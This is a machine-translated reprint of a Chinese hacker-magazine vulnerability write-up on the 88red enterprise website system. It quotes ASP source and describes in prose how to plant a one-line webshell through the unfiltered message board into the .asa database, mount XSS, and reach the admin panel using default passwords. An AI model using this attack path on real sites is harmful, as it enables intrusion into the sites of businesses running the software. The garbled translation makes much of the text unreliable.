Expose 88red to generate HTM static pages enterprise website system vulnerabilities page 1/2
Source: Internet
Author: User
Author: Xiao (xsser) @ [0. s.t]
This article has been published in the hacker manual, issue 4th, reprinted please indicate the source, or in hyperlink to indicate: http://blog.0kee.com/xiaoshuai small blog
I haven't been to as300's for a long time. I'm sorry for the traffic on this release site, and I'm sorry for the strong requirements of so many readers in the hacker Manual (don't throw eggs! Throw money !), Well, since the cows are blowing up, I have to risk my life. Code Well, I thought it was great when I downloaded it. The system was great and he blew it bigger than me. Let's see what he said: 88red: the HTM static page generation system V3.0 was developed and officially launched. It integrates website maps, enterprise news centers, enterprise products, search, customer messages, downloads, and voting systems, it basically covers the basic functions required by a CEN site. Its static page generation function provides the greatest help for the majority of Enterprise websites to Optimize search engine Seo. The system has designed new artists to be closer to the enterprise website. We speak with facts. 1. Unfiltered Message Board opened the Directory and found Conn. ASP, config. ASP and other files, let's take a look, first look at config. there is nothing special in ASP, Conn. ASP is fault tolerant (that is, preventing brute-force databases). No problem? Of course, let's take a look at conn. asp:
<% On error resume next dim conn dim connstr dim dB DB = "Data/qiyedata. asa "set conn = server. createobject ("ADODB. connection ") connstr =" provider = Microsoft. jet. oledb.4.0; Data Source = "& server. mappath (db) Conn. open connstr %>
Shunteng touch... What is it? I have touched the database or the ASA. I first thought of a sentence, a sentence? What can be connected with a sentence? How can we store the data into the database? Users, messages, releases, and other places, I have read that the root directory is static. Do you think about HTML injection? I am waiting for this idea. I will go and check my messages. The messages are static. Alas! Okay. Continue... There is a file named savegb. asp in the root directory. If you want to know that it is the file that saves the message, check its filtering. The piece is as follows:
If request. form ("Code") = "" then "if the verification code is empty," hit you "response. write "<script language = JavaScript> alert ('enter your name'); this. location. href = 'javascript: history. go (-1) '; </SCRIPT> "response. endend ifif request. form ("content") = "" then' you will be deprived of your right to speak without leaving a message. write "<script language = JavaScript> alert ('Enter the message content'); this. location. href = 'javascript: history. go (-1) '; </SCRIPT> "response. endend ifset rs = server. createobject ("ADODB. recordset ") 'meets the preceding two requirements so that you can see the database SQL =" select * from GB "Rs. open SQL, Conn, 3
Alas! There is no prevention or filtering for the file header conn. asp, which leads to two results: 1st. directly write a sentence to get the shell. 2nd. XSS attacks! First, let's look at the first method: write a sentence (there is no interference in the premise database), 1
Then, click "Submit" to input a sentence to the ASA database. I am a small tornado, and the files in the ASA format are not parsed, so I switched to ASP, but the principle is the same. Let's look at Figure 2.
In this way, we can successfully insert a sentence into the database, and then raise the right or something. 2nd. Let's take a look at XSS. The XSS should immediately think of any way to get webshells, such as using the Administrator's session to perform operations or something, and getting webshells across sites, which was written by a cool, let's look at the background. The background verification is okay. At least our omnipotent key is no longer omnipotent. The snippets are as follows:
Theadmin = Replace (TRIM (Request ("user"), "'", "")' filters out spaces, and convert single quotes into space pass = Replace (TRIM (Request ("pass"), "'", "")' and the above filter. Set rs = server. createobject ("ADODB. recordset ") SQL =" select * from Admin where admname = '"& theadmin"' "Then go to database operations Rs. open SQL, Conn, 1, 3if Rs. EOF thenresponse. write "<script language = 'javascript '> alert ('Sorry, this user does not exist! '); Window. location. href = 'login. ASP '; </SCRIPT> "response. endelsepass1 = RS ("admpass") if pass1 = MD5 (PASS) thensession ("admin") = RS ("admname") response. redirect "Main. ASP "elseresponse. write "<script language = 'javascript '> alert ('Sorry, the password is incorrect! '); Window. Location. href = 'login. asp'; </SCRIPT> "End ifend IFRS. closeset rs = nothingconn. closeset conn = nothing
End if
If you don't want to watch it, you will be overwhelmed by the single quotation marks. One of our solutions is to enter the background. Let's continue to look at the code and sort out the ideas for your convenience. Loose message filtering --- a sentence into the database --- à XSS --- à background verification is good, can not go to-à find the configuration file header to view. 2. Use vulnerability 1 shunteng to touch webshell. We use the default password to go in and check the background. We can test the white box and check that webshell is a good tester. Well, you can skip the nonsense and edit the tip carefully, let's look at figure 3.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.